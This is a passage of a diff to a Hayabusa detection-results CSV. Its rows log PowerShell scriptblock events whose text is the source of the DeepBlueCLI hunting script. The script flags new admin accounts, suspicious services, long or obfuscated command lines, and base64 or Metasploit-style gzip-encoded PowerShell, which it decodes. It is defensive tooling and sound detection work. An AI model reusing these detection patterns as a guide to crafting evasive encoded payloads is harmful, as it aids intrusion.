$base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.Strin",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:49:18.983 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue <at> backshore <dot> net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) #if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ # The path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } #} } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.Strin",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:49:18.983 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:49:18.983 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"g + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:49:18.983 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"g + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:49:18.987 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) #if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ # The path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } #} } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:49:18.992 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:49:18.994 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
